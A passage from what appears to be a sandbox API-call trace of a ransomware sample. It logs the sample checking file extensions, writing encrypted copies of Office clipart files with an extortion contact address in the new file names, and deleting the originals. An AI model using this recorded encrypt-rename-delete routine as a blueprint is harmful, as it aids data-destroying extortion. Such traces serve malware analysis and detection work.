(lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.599] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd00705_.wmf")) returned 1 [0064.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0064.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0064.600] lstrlenW (lpString=".doc") returned 4 [0064.600] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.600] lstrlenW (lpString=".docx") returned 5 [0064.600] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.600] lstrlenW (lpString=".pdf") returned 4 [0064.600] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.600] lstrlenW (lpString=".xls") returned 4 [0064.600] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.600] lstrlenW (lpString=".xlsx") returned 5 [0064.600] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.600] lstrlenW (lpString=".ppt") returned 4 [0064.600] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.600] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0064.600] lstrlenW (lpString=".zip") returned 4 [0064.600] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.600] lstrlenW (lpString=".rar") returned 4 [0064.600] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.601] lstrlenW (lpString=".bz2") returned 4 [0064.601] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.601] lstrlenW (lpString=".7z") returned 3 [0064.601] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0064.601] lstrlenW (lpString=".dbf") returned 4 [0064.601] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0064.601] lstrlenW (lpString=".1cd") returned 4 [0064.601] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.601] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD00705_.WMF") returned 68 [0064.601] lstrlenW (lpString=".jpg") returned 4 [0064.601] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.601] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.601] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.601] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.602] GetLastError () returned 0x0 [0064.602] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x39e4, lpOverlapped=0x0) returned 1 [0064.643] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x39f0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x39f0, lpOverlapped=0x0) returned 1 [0064.644] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.644] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.644] SetEndOfFile (hFile=0x2c0) returned 1 [0064.644] CloseHandle (hObject=0x2c0) returned 1 [0064.646] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.646] SetEndOfFile (hFile=0x340) returned 1 [0064.647] CloseHandle (hObject=0x340) returned 1 [0064.647] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.648] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01039_.wmf")) returned 1 [0064.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0064.648] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0064.648] lstrlenW (lpString=".doc") returned 4 [0064.648] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.648] lstrlenW (lpString=".docx") returned 5 [0064.648] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.648] lstrlenW (lpString=".pdf") returned 4 [0064.648] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.648] lstrlenW (lpString=".xls") returned 4 [0064.648] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.648] lstrlenW (lpString=".xlsx") returned 5 [0064.648] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.649] lstrlenW (lpString=".ppt") returned 4 [0064.649] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0064.649] lstrlenW (lpString=".zip") returned 4 [0064.649] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.649] lstrlenW (lpString=".rar") returned 4 [0064.649] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.649] lstrlenW (lpString=".bz2") returned 4 [0064.649] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.649] lstrlenW (lpString=".7z") returned 3 [0064.649] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0064.649] lstrlenW (lpString=".dbf") returned 4 [0064.649] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0064.649] lstrlenW (lpString=".1cd") returned 4 [0064.649] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.649] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01039_.WMF") returned 68 [0064.649] lstrlenW (lpString=".jpg") returned 4 [0064.649] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.649] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.650] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.650] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.650] GetLastError () returned 0x0 [0064.650] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xe20, lpOverlapped=0x0) returned 1 [0064.682] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xe30, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xe30, lpOverlapped=0x0) returned 1 [0064.683] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.683] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.683] SetEndOfFile (hFile=0x2c0) returned 1 [0064.684] CloseHandle (hObject=0x2c0) returned 1 [0064.684] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.684] SetEndOfFile (hFile=0x340) returned 1 [0064.685] CloseHandle (hObject=0x340) returned 1 [0064.686] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.686] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01140_.wmf")) returned 1 [0064.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0064.686] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0064.686] lstrlenW (lpString=".doc") returned 4 [0064.686] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.686] lstrlenW (lpString=".docx") returned 5 [0064.686] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.686] lstrlenW (lpString=".pdf") returned 4 [0064.686] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.687] lstrlenW (lpString=".xls") returned 4 [0064.687] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.687] lstrlenW (lpString=".xlsx") returned 5 [0064.687] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.687] lstrlenW (lpString=".ppt") returned 4 [0064.687] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0064.687] lstrlenW (lpString=".zip") returned 4 [0064.687] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.687] lstrlenW (lpString=".rar") returned 4 [0064.687] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.687] lstrlenW (lpString=".bz2") returned 4 [0064.687] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.687] lstrlenW (lpString=".7z") returned 3 [0064.687] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0064.687] lstrlenW (lpString=".dbf") returned 4 [0064.687] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0064.687] lstrlenW (lpString=".1cd") returned 4 [0064.687] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.687] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01140_.WMF") returned 68 [0064.687] lstrlenW (lpString=".jpg") returned 4 [0064.687] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.688] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.688] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.688] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.688] GetLastError () returned 0x0 [0064.688] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x85c, lpOverlapped=0x0) returned 1 [0064.765] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0x860, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0x860, lpOverlapped=0x0) returned 1 [0064.766] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.766] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.767] SetEndOfFile (hFile=0x2c0) returned 1 [0064.767] CloseHandle (hObject=0x2c0) returned 1 [0064.768] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.768] SetEndOfFile (hFile=0x340) returned 1 [0064.769] CloseHandle (hObject=0x340) returned 1 [0064.769] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.769] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01143_.wmf")) returned 1 [0064.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0064.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0064.770] lstrlenW (lpString=".doc") returned 4 [0064.770] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.770] lstrlenW (lpString=".docx") returned 5 [0064.770] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.770] lstrlenW (lpString=".pdf") returned 4 [0064.770] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.770] lstrlenW (lpString=".xls") returned 4 [0064.770] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.770] lstrlenW (lpString=".xlsx") returned 5 [0064.770] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.770] lstrlenW (lpString=".ppt") returned 4 [0064.770] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.770] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0064.770] lstrlenW (lpString=".zip") returned 4 [0064.770] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.770] lstrlenW (lpString=".rar") returned 4 [0064.771] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.771] lstrlenW (lpString=".bz2") returned 4 [0064.771] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.771] lstrlenW (lpString=".7z") returned 3 [0064.771] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0064.771] lstrlenW (lpString=".dbf") returned 4 [0064.771] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0064.771] lstrlenW (lpString=".1cd") returned 4 [0064.771] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.771] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01143_.WMF") returned 68 [0064.771] lstrlenW (lpString=".jpg") returned 4 [0064.771] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.779] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.779] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.779] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.779] GetLastError () returned 0x0 [0064.779] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xadc, lpOverlapped=0x0) returned 1 [0064.843] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xae0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xae0, lpOverlapped=0x0) returned 1 [0064.844] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.845] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.845] SetEndOfFile (hFile=0x2c0) returned 1 [0064.845] CloseHandle (hObject=0x2c0) returned 1 [0064.846] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.846] SetEndOfFile (hFile=0x340) returned 1 [0064.847] CloseHandle (hObject=0x340) returned 1 [0064.848] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.848] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01145_.wmf")) returned 1 [0064.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0064.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0064.854] lstrlenW (lpString=".doc") returned 4 [0064.854] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.854] lstrlenW (lpString=".docx") returned 5 [0064.854] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.854] lstrlenW (lpString=".pdf") returned 4 [0064.854] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.854] lstrlenW (lpString=".xls") returned 4 [0064.854] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.854] lstrlenW (lpString=".xlsx") returned 5 [0064.854] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.854] lstrlenW (lpString=".ppt") returned 4 [0064.854] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.854] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0064.854] lstrlenW (lpString=".zip") returned 4 [0064.854] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.854] lstrlenW (lpString=".rar") returned 4 [0064.854] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.854] lstrlenW (lpString=".bz2") returned 4 [0064.854] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.855] lstrlenW (lpString=".7z") returned 3 [0064.855] lstrcmpiW (lpString1=".7z", lpString2="WMF") returned -1 [0064.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0064.855] lstrlenW (lpString=".dbf") returned 4 [0064.855] lstrcmpiW (lpString1=".dbf", lpString2=".WMF") returned -1 [0064.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0064.855] lstrlenW (lpString=".1cd") returned 4 [0064.855] lstrcmpiW (lpString1=".1cd", lpString2=".WMF") returned -1 [0064.855] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01145_.WMF") returned 68 [0064.855] lstrlenW (lpString=".jpg") returned 4 [0064.855] lstrcmpiW (lpString1=".jpg", lpString2=".WMF") returned -1 [0064.855] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.855] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.855] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf.id-b4197730.[idecryptyourdata@cock.li].bat"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x2c0 [0064.856] GetLastError () returned 0x0 [0064.856] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0xaec, lpOverlapped=0x0) returned 1 [0064.924] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xaf0, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xaf0, lpOverlapped=0x0) returned 1 [0064.925] ReadFile (in: hFile=0x340, lpBuffer=0x3adf020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x2d0fecc, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesRead=0x2d0fecc*=0x0, lpOverlapped=0x0) returned 1 [0064.925] WriteFile (in: hFile=0x2c0, lpBuffer=0x3adf020*, nNumberOfBytesToWrite=0xec, lpNumberOfBytesWritten=0x2d0fc94, lpOverlapped=0x0 | out: lpBuffer=0x3adf020*, lpNumberOfBytesWritten=0x2d0fc94*=0xec, lpOverlapped=0x0) returned 1 [0064.925] SetEndOfFile (hFile=0x2c0) returned 1 [0064.925] CloseHandle (hObject=0x2c0) returned 1 [0064.927] SetFilePointerEx (in: hFile=0x340, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x2d0fec0 | out: lpNewFilePointer=0x0) returned 1 [0064.927] SetEndOfFile (hFile=0x340) returned 1 [0064.928] CloseHandle (hObject=0x340) returned 1 [0064.929] SetFileAttributesW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF.id-B4197730.[idecryptyourdata@cock.li].bat", dwFileAttributes=0x220) returned 1 [0064.929] DeleteFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\dd01146_.wmf")) returned 1 [0064.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0064.929] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0064.929] lstrlenW (lpString=".doc") returned 4 [0064.929] lstrcmpiW (lpString1=".doc", lpString2=".WMF") returned -1 [0064.929] lstrlenW (lpString=".docx") returned 5 [0064.930] lstrcmpiW (lpString1=".docx", lpString2="_.WMF") returned -1 [0064.930] lstrlenW (lpString=".pdf") returned 4 [0064.930] lstrcmpiW (lpString1=".pdf", lpString2=".WMF") returned -1 [0064.930] lstrlenW (lpString=".xls") returned 4 [0064.930] lstrcmpiW (lpString1=".xls", lpString2=".WMF") returned 1 [0064.930] lstrlenW (lpString=".xlsx") returned 5 [0064.930] lstrcmpiW (lpString1=".xlsx", lpString2="_.WMF") returned -1 [0064.930] lstrlenW (lpString=".ppt") returned 4 [0064.930] lstrcmpiW (lpString1=".ppt", lpString2=".WMF") returned -1 [0064.930] lstrlenW (lpString="C:\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\DD01146_.WMF") returned 68 [0064.930] lstrlenW (lpString=".zip") returned 4 [0064.930] lstrcmpiW (lpString1=".zip", lpString2=".WMF") returned 1 [0064.930] lstrlenW (lpString=".rar") returned 4 [0064.930] lstrcmpiW (lpString1=".rar", lpString2=".WMF") returned -1 [0064.930] lstrlenW (lpString=".bz2") returned 4 [0064.930] lstrcmpiW (lpString1=".bz2", lpString2=".WMF") returned -1 [0064.930] lstrlenW (lpString=".7z") returned 3 